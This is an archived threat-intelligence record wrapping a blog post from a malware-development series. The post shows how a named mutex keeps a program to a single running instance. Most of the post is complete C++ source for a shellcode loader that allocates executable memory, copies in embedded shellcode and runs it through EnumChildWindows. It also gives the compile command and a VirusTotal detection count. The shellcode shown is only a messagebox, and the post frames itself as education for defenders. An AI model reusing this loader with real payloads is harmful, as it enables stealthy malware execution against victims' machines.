{
	"id": "4a786f44-54f4-47b4-8559-f2600d5b0a61",
	"created_at": "2026-04-06T00:14:15.34122Z",
	"updated_at": "2026-04-10T13:12:13.224324Z",
	"deleted_at": null,
	"sha1_hash": "a978c0871cb9d8624936c61edcd39a29c0fa09f7",
	"title": "Malware development tricks: part 26. Mutex. C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 978214,
	"plain_text": "Malware development tricks: part 26. Mutex. C++ example.\r\nBy cocomelonc\r\nPublished: 2023-01-04 · Archived: 2026-04-05 22:46:17 UTC\r\n3 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is the result of my own research into the malware dev trick: prevent self-execution via mutexes.\r\nSometimes, when developing malware, for maximum stealth, it is necessary that the program be launched only\r\nonce. To do this, according to the MSDN documentation, we can use mutexes.\r\nmutexPermalink\r\nFor simplicity, we can use CreateMutexA function from Windows API:\r\nHANDLE CreateMutexA(\r\n LPSECURITY_ATTRIBUTES lpMutexAttributes,\r\n BOOL bInitialOwner,\r\nhttps://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html\r\nPage 1 of 9\n\nLPCSTR lpName\r\n);\r\npractical examplePermalink\r\nIn the simplest implementation, you can use this function in this way:\r\ncreate mutex with specific name, so multiple instances can detect it:\r\nhMutex = CreateMutexA(NULL, FALSE, \"MeowMeowMutex\");\r\ncheck if mutex already exists, exit from app:\r\nif (GetLastError() == ERROR_ALREADY_EXISTS) {\r\n // if this process created the mutex, exit the application\r\n if (hMutex \u0026\u0026 GetLastError() == ERROR_ALREADY_EXISTS) {\r\n CloseHandle(hMutex);\r\n return 0;\r\n }\r\n}\r\notherwise, run malicious logic and close the mutex when done:\r\n//...\r\n// malicious logic\r\nLPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\nRtlMoveMemory(mem, my_payload, sizeof(my_payload));\r\nEnumChildWindows(NULL, (WNDENUMPROC)mem, NULL);\r\n//...\r\n// cleanup\r\nif (hMutex)\r\n CloseHandle(hMutex);\r\nreturn 0;\r\nSo, full source code is looks like:\r\n/*\r\n * hack.cpp - Create mutex, run shellcode. C++ implementation\r\n * @cocomelonc\r\n * https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\nhttps://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html\r\nPage 2 of 9\n\nunsigned char my_payload[] =\r\n // 64-bit meow-meow messagebox\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n \"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nint main(int argc, char* argv[]) {\r\n HANDLE hMutex;\r\n // create mutex with a name so multiple instances can detect it\r\n hMutex = CreateMutexA(NULL, FALSE, \"MeowMeowMutex\");\r\n // check if the mutex already exists\r\n if (GetLastError() == ERROR_ALREADY_EXISTS) {\r\n // if this process created the mutex, exit the application\r\n if (hMutex \u0026\u0026 GetLastError() == ERROR_ALREADY_EXISTS) {\r\n CloseHandle(hMutex);\r\n return 0;\r\n }\r\n }\r\n // shellcode running logic\r\n LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n RtlMoveMemory(mem, my_payload, sizeof(my_payload));\r\n EnumChildWindows(NULL, (WNDENUMPROC)mem, NULL);\r\n // cleanup\r\n if (hMutex)\r\n CloseHandle(hMutex);\r\nhttps://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html\r\nPage 3 of 9\n\nreturn 0;\r\n}\r\nAs you can see, I use running shellcode via EnumChildWindows logic. Also, as usually, use meow-meow\r\nmessagebox payload.\r\ndemoPermalink\r\nLet’s go to see everything in action. Compile our “malware”:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-se\r\nThen, move to victim’s machine (in my case Windows 10 x64 ) and run:\r\n.\\hack.exe\r\nhttps://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html\r\nPage 4 of 9\n\nThen, try to run this “malware” again from another Powershell terminal:\r\nhttps://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html\r\nPage 5 of 9\n\nAs you can see, nothing started, we only have one messagebox.\r\nFor checking correctness, we can add some print to our code:\r\n/*\r\n * hack.cpp - Create mutex, run shellcode. C++ implementation\r\n * @cocomelonc\r\n * https://cocomelonc.github.io/\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003ccstdio\u003e\r\nunsigned char my_payload[] =\r\n // 64-bit meow-meow messagebox\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\nhttps://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html\r\nPage 6 of 9\n\n\"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n \"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nint main(int argc, char* argv[]) {\r\n HANDLE hMutex;\r\n // create mutex with a name so multiple instances can detect it\r\n hMutex = CreateMutexA(NULL, FALSE, \"MeowMeowMutex\");\r\n // check if the mutex already exists\r\n if (GetLastError() == ERROR_ALREADY_EXISTS) {\r\n // if this process created the mutex, exit the application\r\n if (hMutex \u0026\u0026 GetLastError() == ERROR_ALREADY_EXISTS) {\r\n printf(\"MeowMeowMutex already exists, app already running =^..^=\\n\");\r\n CloseHandle(hMutex);\r\n return 0;\r\n }\r\n }\r\n // shellcode running logic\r\n LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n RtlMoveMemory(mem, my_payload, sizeof(my_payload));\r\n EnumChildWindows(NULL, (WNDENUMPROC)mem, NULL);\r\n // cleanup\r\n if (hMutex)\r\n CloseHandle(hMutex);\r\n return 0;\r\n}\r\nThen, repeat our steps again:\r\nhttps://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html\r\nPage 7 of 9\n\nAs you can see everything is worked perfectly!\r\nLet’s go to upload hack.exe to VirusTotal:\r\nSo, 17 of 62 AV engines detect our file as malicious.\r\nhttps://www.virustotal.com/gui/file/153d249063f46b0d56603d7aab7e43a3361d74e9852367d8730f5e57fb9f5b9f/details\r\nThis is trick is used for example by Conti ransomware, Hellokitty ransomware and AsyncRAT in the wild.\r\nhttps://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html\r\nPage 8 of 9\n\nI hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red\r\nteamers arsenal.\r\nConti\r\nHellokitty\r\nHellokitty source code\r\nAsyncRAT source code\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html\r\nhttps://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html"
	],
	"report_names": [
		"malware-tricks-26.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434455,
	"ts_updated_at": 1775826733,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a978c0871cb9d8624936c61edcd39a29c0fa09f7.pdf",
		"text": "https://archive.orkl.eu/a978c0871cb9d8624936c61edcd39a29c0fa09f7.txt",
		"img": "https://archive.orkl.eu/a978c0871cb9d8624936c61edcd39a29c0fa09f7.jpg"
	}
}